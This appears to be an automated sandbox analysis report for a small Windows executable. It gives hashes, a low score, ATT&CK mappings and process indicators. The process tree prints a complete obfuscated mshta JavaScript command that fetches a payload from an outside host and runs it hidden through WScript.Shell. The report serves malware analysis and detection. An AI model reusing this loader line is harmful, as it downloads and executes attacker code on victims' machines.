9608129701213f7565040f385e8c263d0daaa01ce31dcc7f95a7584c7bf4ad44

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
31-07-2024 10:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe
Size

2KB
MD5

0fd2355a4674cd4a70f9b1f422ab984c
SHA1

d41bdbf1a226c4c9be075ae02f138de257a89d5b
SHA256

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2
SHA512

69c87b9f0235f6850ff7463674fdeff0c7d20075e33efe3e6d960606d199ff3d6696e4523e658e003ecf80731d82b91d3264a7225ce59ef45cbc3476e46a89c6

Score

3^/10

discovery

Malware Config

Signatures

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe

description	pid	process	target process
PID 4544 wrote to memory of 4208	4544	fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe	mshta.exe
PID 4544 wrote to memory of 4208	4544	fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe	mshta.exe
PID 4544 wrote to memory of 4208	4544	fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe	mshta.exe

C:\Users\Admin\AppData\Local\Temp\fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe
"C:\Users\Admin\AppData\Local\Temp\fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Windows\SysWOW64\mshta.exe
  mshta "javascript:document.write();42;y=unescape('%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32').split('~');103;try{x='WinHttp';127;x=new ActiveXObject(x+'.'+x+'Request.5.1');26;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);192;x.send();37;y='ipt.S';72;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);179;}catch(e){};234;;window.close();"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads